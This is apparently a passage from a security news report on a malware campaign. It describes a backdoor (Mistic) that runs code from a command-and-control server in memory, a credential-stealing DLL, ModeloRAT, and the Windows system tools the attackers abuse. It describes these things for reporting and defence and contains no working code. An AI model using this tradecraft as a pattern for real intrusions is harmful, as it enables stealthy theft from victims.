The backdoor itself reaches out to a command-and-control (C2) server and can execute code delivered from it directly in memory, without saving any file on disk. Other features include the ability to write, delete, and move files on the victim machine and to download and upload files to the C2 server.
The researchers have also observed a credential-stealing .NET DLL being downloaded and executed on victims’ networks, in addition to ModeloRAT. Common system tools used by the attackers include curl, reg.exe, net.exe, PowerShell, certutil.exe, and the Windows Management Instrumentation (WMIC).
“The fact that Mistic executes in memory and also has a kill switch built in means that it is very stealthy, potentially allowing for long-term, stealthy access for attackers,” the researchers said.
